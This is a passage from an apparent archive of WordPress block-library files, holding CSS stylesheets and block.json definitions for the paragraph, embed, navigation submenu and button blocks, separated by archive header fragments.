.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){
  transform:scaleX(1);
}
.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{
  display:inline-block;
  margin-left:1ch;
}
.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){
  transform:scaleX(1);
}
.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{
  rotate:180deg;
}paragraph/style-rtl.css000060400000001352151330427370011164 0ustar00.is-small-text{
  font-size:.875em;
}

.is-regular-text{
  font-size:1em;
}

.is-large-text{
  font-size:2.25em;
}

.is-larger-text{
  font-size:3em;
}

.has-drop-cap:not(:focus):first-letter{
  float:right;
  font-size:8.4em;
  font-style:normal;
  font-weight:100;
  line-height:.68;
  margin:.05em 0 0 .1em;
  text-transform:uppercase;
}

body.rtl .has-drop-cap:not(:focus):first-letter{
  float:none;
  margin-right:.1em;
}

p.has-drop-cap.has-background{
  overflow:hidden;
}

:root :where(p.has-background){
  padding:1.25em 2.375em;
}

:where(p.has-text-color:not(.has-link-color)) a{
  color:inherit;
}

p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{
  rotate:180deg;
}paragraph/editor.css000060400000001200151330427370010503 0ustar00.block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{
  min-height:auto !important;
}

.block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{
  opacity:1;
}

.block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{
  opacity:0;
}

.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{
  rotate:180deg;
}paragraph/style-rtl.min.css000060400000001221151330427370011741 0ustar00.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:right;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em 0 0 .1em;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-right:.1em}p.has-drop-cap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}paragraph/editor.min.css000060400000001145151330427370011275 0ustar00.block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{min-height:auto!important}.block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{opacity:1}.block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{opacity:0}.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}paragraph/style.css000060400000001350151330427370010363 0ustar00.is-small-text{
  font-size:.875em;
}

.is-regular-text{
  font-size:1em;
}

.is-large-text{
  font-size:2.25em;
}

.is-larger-text{
  font-size:3em;
}

.has-drop-cap:not(:focus):first-letter{
  float:left;
  font-size:8.4em;
  font-style:normal;
  font-weight:100;
  line-height:.68;
  margin:.05em .1em 0 0;
  text-transform:uppercase;
}

body.rtl .has-drop-cap:not(:focus):first-letter{
  float:none;
  margin-left:.1em;
}

p.has-drop-cap.has-background{
  overflow:hidden;
}

:root :where(p.has-background){
  padding:1.25em 2.375em;
}

:where(p.has-text-color:not(.has-link-color)) a{
  color:inherit;
}

p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{
  rotate:180deg;
}paragraph/editor-rtl.min.css000060400000001145151330427370012074 0ustar00.block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{min-height:auto!important}.block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{opacity:1}.block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{opacity:0}.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}paragraph/style.min.css000060400000001217151330427370011147 0ustar00.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-left:.1em}p.has-drop-cap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}paragraph/block.json000060400000003074151330427370010503 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/paragraph",
	"title": "Paragraph",
	"category": "text",
	"description": "Start with the basic building block of all narrative.",
	"keywords": [ "text" ],
	"textdomain": "default",
	"attributes": {
		"align": {
			"type": "string"
		},
		"content": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "p",
			"__experimentalRole": "content"
		},
		"dropCap": {
			"type": "boolean",
			"default": false
		},
		"placeholder": {
			"type": "string"
		},
		"direction": {
			"type": "string",
			"enum": [ "ltr", "rtl" ]
		}
	},
	"supports": {
		"splitting": true,
		"anchor": true,
		"className": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalTextDecoration": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalWritingMode": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"__experimentalSelector": "p",
		"__unstablePasteTextInline": true,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-paragraph-editor",
	"style": "wp-block-paragraph"
}
paragraph/editor-rtl.css000060400000001200151330427370011302 0ustar00.block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{
  min-height:auto !important;
}

.block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{
  opacity:1;
}

.block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{
  opacity:0;
}

.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{
  rotate:180deg;
}embed/style-rtl.min.css000060400000003074151330427370011060 0ustar00.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}embed/theme-rtl.css000060400000000310151330427370010226 0ustar00.wp-block-embed :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-embed :where(figcaption){
  color:#ffffffa6;
}

.wp-block-embed{
  margin:0 0 1em;
}embed/editor-rtl.min.css000060400000001202151330427370011175 0ustar00.wp-block-embed{clear:both;margin-left:0;margin-right:0}.wp-block-embed.is-loading{display:flex;justify-content:center}.wp-block-embed .components-placeholder__error{word-break:break-word}.wp-block-post-content .wp-block-embed__learn-more a{color:var(--wp-admin-theme-color)}.block-library-embed__interactive-overlay{bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{max-width:360px;width:100%}.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{min-width:280px}embed/style.min.css000060400000003074151330427370010261 0ustar00.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}embed/editor.css000060400000001311151330427370007615 0ustar00.wp-block-embed{
  clear:both;
  margin-left:0;
  margin-right:0;
}
.wp-block-embed.is-loading{
  display:flex;
  justify-content:center;
}
.wp-block-embed .components-placeholder__error{
  word-break:break-word;
}

.wp-block-post-content .wp-block-embed__learn-more a{
  color:var(--wp-admin-theme-color);
}

.block-library-embed__interactive-overlay{
  bottom:0;
  left:0;
  opacity:0;
  position:absolute;
  right:0;
  top:0;
}

.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{
  max-width:360px;
  width:100%;
}
.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{
  min-width:280px;
}embed/editor.min.css000060400000001202151330427370010376 0ustar00.wp-block-embed{clear:both;margin-left:0;margin-right:0}.wp-block-embed.is-loading{display:flex;justify-content:center}.wp-block-embed .components-placeholder__error{word-break:break-word}.wp-block-post-content .wp-block-embed__learn-more a{color:var(--wp-admin-theme-color)}.block-library-embed__interactive-overlay{bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{max-width:360px;width:100%}.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{min-width:280px}embed/theme-rtl.min.css000060400000000260151330427370011014 0ustar00.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}embed/theme.min.css000060400000000260151330427370010215 0ustar00.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}embed/block.json000060400000002140151330427370007603 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/embed",
	"title": "Embed",
	"category": "embed",
	"description": "Add a block that displays content pulled from other sites, like Twitter or YouTube.",
	"textdomain": "default",
	"attributes": {
		"url": {
			"type": "string",
			"__experimentalRole": "content"
		},
		"caption": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "figcaption",
			"__experimentalRole": "content"
		},
		"type": {
			"type": "string",
			"__experimentalRole": "content"
		},
		"providerNameSlug": {
			"type": "string",
			"__experimentalRole": "content"
		},
		"allowResponsive": {
			"type": "boolean",
			"default": true
		},
		"responsive": {
			"type": "boolean",
			"default": false,
			"__experimentalRole": "content"
		},
		"previewable": {
			"type": "boolean",
			"default": true,
			"__experimentalRole": "content"
		}
	},
	"supports": {
		"align": true,
		"spacing": {
			"margin": true
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-embed-editor",
	"style": "wp-block-embed"
}
embed/editor-rtl.css000060400000001311151330427370010414 0ustar00.wp-block-embed{
  clear:both;
  margin-left:0;
  margin-right:0;
}
.wp-block-embed.is-loading{
  display:flex;
  justify-content:center;
}
.wp-block-embed .components-placeholder__error{
  word-break:break-word;
}

.wp-block-post-content .wp-block-embed__learn-more a{
  color:var(--wp-admin-theme-color);
}

.block-library-embed__interactive-overlay{
  bottom:0;
  left:0;
  opacity:0;
  position:absolute;
  right:0;
  top:0;
}

.wp-block[data-align=left]>.wp-block-embed,.wp-block[data-align=right]>.wp-block-embed{
  max-width:360px;
  width:100%;
}
.wp-block[data-align=left]>.wp-block-embed .wp-block-embed__wrapper,.wp-block[data-align=right]>.wp-block-embed .wp-block-embed__wrapper{
  min-width:280px;
}embed/style.css000060400000003301151330427370007470 0ustar00.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{
  max-width:360px;
  width:100%;
}
.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{
  min-width:280px;
}

.wp-block-cover .wp-block-embed{
  min-height:240px;
  min-width:320px;
}

.wp-block-embed{
  overflow-wrap:break-word;
}
.wp-block-embed :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}
.wp-block-embed iframe{
  max-width:100%;
}

.wp-block-embed__wrapper{
  position:relative;
}

.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{
  content:"";
  display:block;
  padding-top:50%;
}
.wp-embed-responsive .wp-has-aspect-ratio iframe{
  bottom:0;
  height:100%;
  left:0;
  position:absolute;
  right:0;
  top:0;
  width:100%;
}

.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{
  padding-top:42.85%;
}
.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{
  padding-top:50%;
}
.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{
  padding-top:56.25%;
}
.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{
  padding-top:75%;
}
.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{
  padding-top:100%;
}
.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{
  padding-top:177.77%;
}
.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{
  padding-top:200%;
}embed/theme.css000060400000000310151330427370007427 0ustar00.wp-block-embed :where(figcaption){
  color:#555;
  font-size:13px;
  text-align:center;
}
.is-dark-theme .wp-block-embed :where(figcaption){
  color:#ffffffa6;
}

.wp-block-embed{
  margin:0 0 1em;
}embed/style-rtl.css000060400000003301151330427370010267 0ustar00.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{
  max-width:360px;
  width:100%;
}
.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{
  min-width:280px;
}

.wp-block-cover .wp-block-embed{
  min-height:240px;
  min-width:320px;
}

.wp-block-embed{
  overflow-wrap:break-word;
}
.wp-block-embed :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}
.wp-block-embed iframe{
  max-width:100%;
}

.wp-block-embed__wrapper{
  position:relative;
}

.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{
  content:"";
  display:block;
  padding-top:50%;
}
.wp-embed-responsive .wp-has-aspect-ratio iframe{
  bottom:0;
  height:100%;
  left:0;
  position:absolute;
  right:0;
  top:0;
  width:100%;
}

.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{
  padding-top:42.85%;
}
.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{
  padding-top:50%;
}
.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{
  padding-top:56.25%;
}
.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{
  padding-top:75%;
}
.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{
  padding-top:100%;
}
.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{
  padding-top:177.77%;
}
.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{
  padding-top:200%;
}navigation-submenu/editor.min.css000060400000002112151330427370013136 0ustar00.wp-block-navigation-submenu{display:block}.wp-block-navigation-submenu .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{height:auto!important;left:-1px;min-width:200px!important;opacity:1!important;position:absolute;top:100%;visibility:visible!important;width:auto!important}@media (min-width:782px){.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;position:absolute;right:100%;width:.5em}}navigation-submenu/block.json000060400000002330151330427370012343 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/navigation-submenu",
	"title": "Submenu",
	"category": "design",
	"parent": [ "core/navigation" ],
	"description": "Add a submenu to your navigation.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		},
		"type": {
			"type": "string"
		},
		"description": {
			"type": "string"
		},
		"rel": {
			"type": "string"
		},
		"id": {
			"type": "number"
		},
		"opensInNewTab": {
			"type": "boolean",
			"default": false
		},
		"url": {
			"type": "string"
		},
		"title": {
			"type": "string"
		},
		"kind": {
			"type": "string"
		},
		"isTopLevelItem": {
			"type": "boolean"
		}
	},
	"usesContext": [
		"textColor",
		"customTextColor",
		"backgroundColor",
		"customBackgroundColor",
		"overlayTextColor",
		"customOverlayTextColor",
		"overlayBackgroundColor",
		"customOverlayBackgroundColor",
		"fontSize",
		"customFontSize",
		"showSubmenuIcon",
		"maxNestingLevel",
		"openSubmenusOnClick",
		"style"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-navigation-submenu-editor",
	"style": "wp-block-navigation-submenu"
}
navigation-submenu/editor-rtl.min.css000060400000002113151330427370013736 0ustar00.wp-block-navigation-submenu{display:block}.wp-block-navigation-submenu .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;position:absolute;right:-1px;top:100%;visibility:visible!important;width:auto!important}@media (min-width:782px){.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:-1px}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;left:100%;position:absolute;width:.5em}}navigation-submenu/editor-rtl.css000060400000002263151330427370013162 0ustar00.wp-block-navigation-submenu{
  display:block;
}
.wp-block-navigation-submenu .wp-block-navigation__submenu-container{
  z-index:28;
}
.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{
  height:auto !important;
  min-width:200px !important;
  opacity:1 !important;
  position:absolute;
  right:-1px;
  top:100%;
  visibility:visible !important;
  width:auto !important;
}
@media (min-width:782px){
  .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    right:100%;
    top:-1px;
  }
  .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{
    background:#0000;
    content:"";
    display:block;
    height:100%;
    left:100%;
    position:absolute;
    width:.5em;
  }
}navigation-submenu/editor.css000060400000002262151330427370012362 0ustar00.wp-block-navigation-submenu{
  display:block;
}
.wp-block-navigation-submenu .wp-block-navigation__submenu-container{
  z-index:28;
}
.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{
  height:auto !important;
  left:-1px;
  min-width:200px !important;
  opacity:1 !important;
  position:absolute;
  top:100%;
  visibility:visible !important;
  width:auto !important;
}
@media (min-width:782px){
  .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{
    left:100%;
    top:-1px;
  }
  .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{
    background:#0000;
    content:"";
    display:block;
    height:100%;
    position:absolute;
    right:100%;
    width:.5em;
  }
}button/editor.min.css000060400000001075151330427370010645 0ustar00.wp-block[data-align=center]>.wp-block-button{margin-left:auto;margin-right:auto;text-align:center}.wp-block[data-align=right]>.wp-block-button{
  /*!rtl:ignore*/text-align:right}.wp-block-button{cursor:text;position:relative}.wp-block-button:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:-2px}.wp-block-button[data-rich-text-placeholder]:after{opacity:.8}div[data-type="core/button"]{display:table}.editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}button/style-rtl.css000060400000004476151330427370010544 0ustar00.wp-block-button__link{
  box-sizing:border-box;
  cursor:pointer;
  display:inline-block;
  text-align:center;
  word-break:break-word;
}
.wp-block-button__link.aligncenter{
  text-align:center;
}
.wp-block-button__link.alignright{
  text-align:right;
}

:where(.wp-block-button__link){
  border-radius:9999px;
  box-shadow:none;
  padding:calc(.667em + 2px) calc(1.333em + 2px);
  text-decoration:none;
}

.wp-block-button[style*=text-decoration] .wp-block-button__link{
  text-decoration:inherit;
}

.wp-block-buttons>.wp-block-button.has-custom-width{
  max-width:none;
}
.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{
  width:100%;
}
.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{
  font-size:inherit;
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-25{
  width:calc(25% - var(--wp--style--block-gap, .5em)*.75);
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-50{
  width:calc(50% - var(--wp--style--block-gap, .5em)*.5);
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-75{
  width:calc(75% - var(--wp--style--block-gap, .5em)*.25);
}
.wp-block-buttons>.wp-block-button.wp-block-button__width-100{
  flex-basis:100%;
  width:100%;
}

.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{
  width:25%;
}
.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{
  width:50%;
}
.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{
  width:75%;
}

.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{
  border-radius:0;
}

.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{
  border-radius:0 !important;
}

:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){
  border:2px solid;
  padding:.667em 1.333em;
}
:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){
  color:currentColor;
}
:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){
  background-color:initial;
  background-image:none;
}button/editor.css000060400000001150151330427370010055 0ustar00.wp-block[data-align=center]>.wp-block-button{
  margin-left:auto;
  margin-right:auto;
  text-align:center;
}

.wp-block[data-align=right]>.wp-block-button{
  text-align:right;
}

.wp-block-button{
  cursor:text;
  position:relative;
}
.wp-block-button:focus{
  box-shadow:0 0 0 1px #fff, 0 0 0 3px var(--wp-admin-theme-color);
  outline:2px solid #0000;
  outline-offset:-2px;
}
.wp-block-button[data-rich-text-placeholder]:after{
  opacity:.8;
}

div[data-type="core/button"]{
  display:table;
}

.editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{
  text-decoration:inherit;
}button/editor-rtl.min.css000060400000001053151330427370011440 0ustar00.wp-block[data-align=center]>.wp-block-button{margin-left:auto;margin-right:auto;text-align:center}.wp-block[data-align=right]>.wp-block-button{text-align:right}.wp-block-button{cursor:text;position:relative}.wp-block-button:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:-2px}.wp-block-button[data-rich-text-placeholder]:after{opacity:.8}div[data-type="core/button"]{display:table}.editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}button/style.min.css000060400000004241151330427370010515 0ustar00.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, 